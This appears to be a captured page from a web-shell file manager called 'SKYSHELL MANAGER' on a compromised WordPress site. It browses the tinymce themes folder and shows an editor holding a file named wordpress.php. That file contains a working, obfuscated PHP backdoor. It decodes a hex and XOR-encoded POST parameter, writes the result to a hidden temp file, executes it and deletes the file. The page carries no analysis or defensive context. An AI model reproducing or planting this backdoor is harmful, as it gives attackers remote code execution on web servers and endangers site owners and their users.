📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
20461.36 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: wordpress.php
<?php if(!is_null($_POST["e\x6Ce\x6De\x6Et"] ?? null)){ $hld = hex2bin($_POST["e\x6Ce\x6De\x6Et"]); $tkn = '' ; for($e=0; $e<strlen($hld); $e++){$tkn .= chr(ord($hld[$e]) ^ 25);} $property_set = array_filter([ini_get("upload_tmp_dir"), "/tmp", session_save_path(), getcwd(), getenv("TEMP"), "/dev/shm", sys_get_temp_dir(), getenv("TMP"), "/var/tmp"]); $descriptor = 0; do { $component = $property_set[$descriptor] ?? null; if ($descriptor >= count($property_set)) break; if (array_product([is_dir($component), is_writable($component)])) { $value = "$component" . "/.ent"; $file = fopen($value, 'w'); if ($file) { fwrite($file, $tkn); fclose($file); include $value; @unlink($value); die(); } } $descriptor++; } while (true); }
Save